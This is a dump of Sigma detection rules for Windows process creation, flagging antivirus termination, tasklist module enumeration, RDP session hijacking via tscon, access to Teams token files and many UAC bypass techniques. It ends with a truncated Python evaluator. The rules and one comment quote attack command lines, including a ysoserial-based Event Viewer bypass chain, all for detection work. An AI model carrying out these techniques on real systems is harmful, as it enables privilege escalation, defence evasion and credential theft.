    "content": "title: Taskkill Symantec Endpoint Protection\nid: 4a6713f6-3331-11ed-a261-0242ac120002\nstatus: test\ndescription: |\n    Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\n    Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\n    As a result, the NT AUTHORITY/SYSTEM user can execute the command taskkill /im ccSvcHst.exe /f several times, thereby killing the process belonging to the service and thus shutting down the service.\nreferences:\n    - https://www.exploit-db.com/exploits/37525\n    - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection\n    - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer\nauthor: Ilya Krestinichev, Florian Roth (Nextron Systems)\ndate: 2022-09-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'taskkill'\n            - ' /F '\n            - ' /IM '\n            - 'ccSvcHst.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml",
    "content": "title: Loaded Module Enumeration Via Tasklist.EXE\nid: 34275eb8-fa19-436b-b959-3d9ecd53fa1f\nstatus: test\ndescription: |\n    Detects the enumeration of a specific DLL or EXE being used by a binary via \"tasklist.exe\".\n    This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question,\n    in order to dump the process memory or perform other nefarious actions.\nreferences:\n    - https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/\n    - https://pentestlab.blog/tag/svchost/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-02-12\nmodified: 2024-03-13\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\tasklist.exe'\n        - OriginalFileName: 'tasklist.exe'\n    selection_flags:\n        CommandLine|contains|windash: '-m'\n    selection_module:\n        # Note: add other interesting modules or binaries\n        CommandLine|contains: 'rdpcorets.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_taskmgr_localsystem.yml",
    "content": "title: Taskmgr as LOCAL_SYSTEM\nid: 9fff585c-c33e-4a86-b3cd-39312079a65f\nstatus: test\ndescription: Detects the creation of a taskmgr.exe process in the context of LOCAL_SYSTEM\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-18\nmodified: 2022-05-27\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        Image|endswith: '\\taskmgr.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_taskmgr_susp_child_process.yml",
    "content": "title: New Process Created Via Taskmgr.EXE\nid: 3d7679bd-0c00-440c-97b0-3f204273e6c7\nstatus: test\ndescription: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC\nreferences:\n    - https://twitter.com/ReneFreingruber/status/1172244989335810049\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-13\nmodified: 2024-01-18\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\taskmgr.exe'\n    filter_main_generic:\n        Image|endswith:\n            - ':\\Windows\\System32\\mmc.exe'\n            - ':\\Windows\\System32\\resmon.exe'\n            - ':\\Windows\\System32\\Taskmgr.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml",
    "content": "title: Potentially Suspicious Command Targeting Teams Sensitive Files\nid: d2eb17db-1d39-41dc-b57f-301f6512fa75\nstatus: test\ndescription: |\n    Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.\n    The database might contain authentication tokens and other sensitive information about the logged in accounts.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\n    - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens\nauthor: '@SerkinValery'\ndate: 2022-09-16\nmodified: 2023-12-18\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '\\Microsoft\\Teams\\Cookies'\n            - '\\Microsoft\\Teams\\Local Storage\\leveldb'\n    filter_main_legit_locations:\n        Image|endswith: '\\Microsoft\\Teams\\current\\Teams.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml",
    "content": "title: New Virtual Smart Card Created Via TpmVscMgr.EXE\nid: c633622e-cab9-4eaa-bb13-66a1d68b3e47\nstatus: test\ndescription: Detects execution of \"Tpmvscmgr.exe\" to create a new virtual smart card.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-15\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\tpmvscmgr.exe'\n        OriginalFileName: 'TpmVscMgr.exe'\n    selection_cli:\n        CommandLine|contains: 'create'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml",
    "content": "title: Suspicious TSCON Start as SYSTEM\nid: 9847f263-4a81-424f-970c-875dab15b79b\nstatus: test\ndescription: Detects a tscon.exe start as LOCAL SYSTEM\nreferences:\n    - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\n    - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6\n    - https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-17\nmodified: 2022-05-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        Image|endswith: '\\tscon.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml",
    "content": "title: Suspicious RDP Redirect Using TSCON\nid: f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb\nstatus: test\ndescription: Detects a suspicious RDP session redirect using tscon.exe\nreferences:\n    - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\n    - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6\n    - https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-17\nmodified: 2023-05-16\ntags:\n    - attack.lateral-movement\n    - attack.t1563.002\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' /dest:rdp-tcp#'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml",
    "content": "title: Potential RDP Session Hijacking Activity\nid: 224f140f-3553-4cd1-af78-13d81bf9f7cc\nstatus: test\ndescription: Detects potential RDP Session Hijacking activity on Windows systems\nreferences:\n    - https://twitter.com/Moti_B/status/909449115477659651\nauthor: '@juju4'\ndate: 2022-12-27\nmodified: 2024-12-01\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\tscon.exe'\n        - OriginalFileName: 'tscon.exe'\n    selection_integrity:\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml",
    "content": "title: UAC Bypass Using ChangePK and SLUI\nid: 503d581c-7df0-4bbe-b9be-5840c0ecc1fc\nstatus: test\ndescription: Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61)\nreferences:\n    - https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b\n    - https://github.com/hfiref0x/UACME\n    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\changepk.exe'\n        ParentImage|endswith: '\\slui.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml",
    "content": "title: UAC Bypass Using Disk Cleanup\nid: b697e69c-746f-4a86-9f59-7bfff8eab881\nstatus: test\ndescription: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|endswith: '\"\\system32\\cleanmgr.exe /autoclean /d C:'\n        ParentCommandLine: 'C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml",
    "content": "title: Bypass UAC via CMSTP\nid: e66779cc-383e-4224-a3a4-267eeb585c40\nstatus: test\ndescription: Detects command-line usage of the Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Cmstp/\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2022-08-30\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\n    - attack.t1218.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmstp.exe'\n        - OriginalFileName: 'CMSTP.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - '/s'\n            - '-s'\n            - '/au'\n            - '-au'\n            - '/ni'\n            - '-ni'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use of the cmstp.exe utility by a legitimate user\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml",
    "content": "title: CMSTP UAC Bypass via COM Object Access\nid: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253\nstatus: stable\ndescription: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\n    - https://twitter.com/hFireF0X/status/897640081053364225\n    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf\n    - https://github.com/hfiref0x/UACME\nauthor: Nik Seetharaman, Christian Burkard (Nextron Systems)\ndate: 2019-07-31\nmodified: 2024-12-01\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - attack.t1218.003\n    - attack.g0069\n    - car.2019-04-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\DllHost.exe'\n        ParentCommandLine|contains:\n            - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' # cmstplua.dll\n            - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' # CMLUAUTIL\n            - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' # EditionUpgradeManagerObj.dll\n            - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' # colorui.dll\n            - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' # wscui.cpl\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Legitimate CMSTP use (unlikely in modern enterprise environments)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml",
    "content": "title: UAC Bypass Tools Using ComputerDefaults\nid: 3c05e90d-7eba-4324-9972-5d7f711a60a8\nstatus: test\ndescription: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-31\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n        Image: 'C:\\Windows\\System32\\ComputerDefaults.exe'\n    filter:\n        ParentImage|contains:\n            - ':\\Windows\\System32'\n            - ':\\Program Files'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml",
    "content": "title: UAC Bypass Using Consent and Comctl32 - Process\nid: 1ca6bd18-0ba0-44ca-851c-92ed89a61085\nstatus: test\ndescription: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\consent.exe'\n        Image|endswith: '\\werfault.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml",
    "content": "title: UAC Bypass Using DismHost\nid: 853e74f9-9392-4935-ad3b-2e8c040dae86\nstatus: test\ndescription: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\DismHost.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml",
    "content": "title: UAC Bypass Using Event Viewer RecentViews\nid: 30fc8de7-d833-40c4-96b6-28319fbc4f6c\nrelated:\n    - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43\n      type: similar\nstatus: test\ndescription: Detects the pattern of UAC Bypass using Event Viewer RecentViews\nreferences:\n    - https://twitter.com/orange_8361/status/1518970259868626944\n    - https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_path:\n        # Example: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews & eventvwr.exe\n        CommandLine|contains:\n            - '\\Event Viewer\\RecentViews'\n            - '\\EventV~1\\RecentViews'\n    selection_redirect:\n        CommandLine|contains: '>'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml",
    "content": "title: Bypass UAC via Fodhelper.exe\nid: 7f741dcf-fc22-4759-87b4-9ae8376676a2\nstatus: test\ndescription: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\fodhelper.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of fodhelper.exe utility by legitimate user\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml",
    "content": "title: UAC Bypass via Windows Firewall Snap-In Hijack\nid: e52cb31c-10ed-4aea-bcb7-593c9f4a315b\nstatus: test\ndescription: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in\nreferences:\n    - https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\mmc.exe'\n        ParentCommandLine|contains: 'WF.msc'\n    filter:\n        Image|endswith: '\\WerFault.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml",
    "content": "title: UAC Bypass via ICMLuaUtil\nid: 49f2f17b-b4c8-4172-a68b-d5bf95d05130\nstatus: test\ndescription: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface\nreferences:\n    - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html\nauthor: Florian Roth (Nextron Systems), Elastic (idea)\ndate: 2022-09-13\nmodified: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\dllhost.exe'\n        ParentCommandLine|contains:\n            - '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'\n            - '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}'\n    filter:\n        - Image|endswith: '\\WerFault.exe'\n        - OriginalFileName: 'WerFault.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml",
    "content": "title: UAC Bypass Using IDiagnostic Profile\nid: 4cbef972-f347-4170-b62a-8253f6168e6d\nstatus: test\ndescription: Detects the \"IDiagnosticProfileUAC\" UAC bypass technique\nreferences:\n    - https://github.com/Wh04m1001/IDiagnosticProfileUAC\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-03\nmodified: 2024-12-01\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\DllHost.exe'\n        ParentCommandLine|contains: ' /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml",
    "content": "title: UAC Bypass Using IEInstal - Process\nid: 80fc36aa-945e-4181-89f2-2f907ab6775d\nstatus: test\ndescription: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n        ParentImage|endswith: '\\ieinstal.exe'\n        Image|contains: '\\AppData\\Local\\Temp\\'\n        Image|endswith: 'consent.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml",
    "content": "title: UAC Bypass Using MSConfig Token Modification - Process\nid: ad92e3f9-7eb6-460e-96b1-582b0ccbb980\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n        ParentImage|endswith: '\\AppData\\Local\\Temp\\pkgmgr.exe'\n        CommandLine: '\"C:\\Windows\\system32\\msconfig.exe\" -5'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml",
    "content": "title: UAC Bypass Using NTFS Reparse Point - Process\nid: 39ed3c80-e6a1-431b-9df3-911ac53d08a7\nstatus: test\ndescription: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|startswith: '\"C:\\Windows\\system32\\wusa.exe\"  /quiet C:\\Users\\'\n        CommandLine|endswith: '\\AppData\\Local\\Temp\\update.msu'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    selection2:\n        ParentCommandLine: '\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\dismhost.exe {'\n        Image|endswith: '\\DismHost.exe'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml",
    "content": "title: UAC Bypass Using PkgMgr and DISM\nid: a743ceba-c771-4d75-97eb-8a90f7f4844c\nstatus: test\ndescription: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\pkgmgr.exe'\n        Image|endswith: '\\dism.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml",
    "content": "title: Potential UAC Bypass Via Sdclt.EXE\nid: 40f9af16-589d-4984-b78d-8c2aec023197\nstatus: test\ndescription: A general detection for sdclt.exe being spawned as an elevated process. This could be an indicator of sdclt.exe being used in UAC bypass techniques.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/6\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: 'sdclt.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml",
    "content": "title: TrustedPath UAC Bypass Pattern\nid: 4ac47ed3-44c2-4b1f-9d51-bf46e8914126\nrelated:\n    - id: 0cbe38c0-270c-41d9-ab79-6e5a9a669290\n      type: similar\nstatus: test\ndescription: Detects indicators of a UAC bypass method by mocking directories\nreferences:\n    - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\n    - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n    - https://github.com/netero1010/TrustedPath-UACBypass-BOF\n    - https://x.com/Wietze/status/1933495426952421843\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-27\nmodified: 2025-06-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - 'C:\\Windows \\System32\\'\n            - 'C:\\Windows \\SysWOW64\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
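The rules above read as data, but watching them fire on events makes three details explicit that are easy to misread: `|windash` makes the author's `-m` also match `/m` (Loaded Module Enumeration Via Tasklist.EXE); `selection and not 1 of filter_main_*` drops Teams' own access to its database (Potentially Suspicious Command Targeting Teams Sensitive Files); listing both `High` and `S-1-16-12288` catches log sources that report the integrity level as a SID (Potential UAC Bypass Via Sdclt.EXE); and `contains|all` with `' /F '` needs the surrounding spaces, so `taskkill /IM ccSvcHst.exe /F` slips past Taskkill Symantec Endpoint Protection. The evaluator below is an added example, not Sigma project code and not pySigma; it implements only the modifiers and condition forms these five rules use (plus TrustedPath UAC Bypass Pattern), and the events are constructed samples with Sysmon-style field names, not logs from a real host.

```python
"""Tiny evaluator for five of the Sigma process_creation rules on this page.
Added example, not Sigma project code (pySigma is the real tooling). Covers only
what these rules need: contains/endswith, the |all and |windash modifiers, and
conditions made of selection names, 'all of X*', '1 of X*', 'and', 'or', 'not'."""
import fnmatch
import re

# Detection blocks transcribed from the rules above; condition strings verbatim.
RULES = {
    "taskkill_sep": {"condition": "selection", "detection": {
        "selection": {"CommandLine|contains|all": ["taskkill", " /F ", " /IM ", "ccSvcHst.exe"]}}},
    "tasklist_module_enum": {"condition": "all of selection_*", "detection": {
        "selection_img": [{"Image|endswith": "\\tasklist.exe"}, {"OriginalFileName": "tasklist.exe"}],
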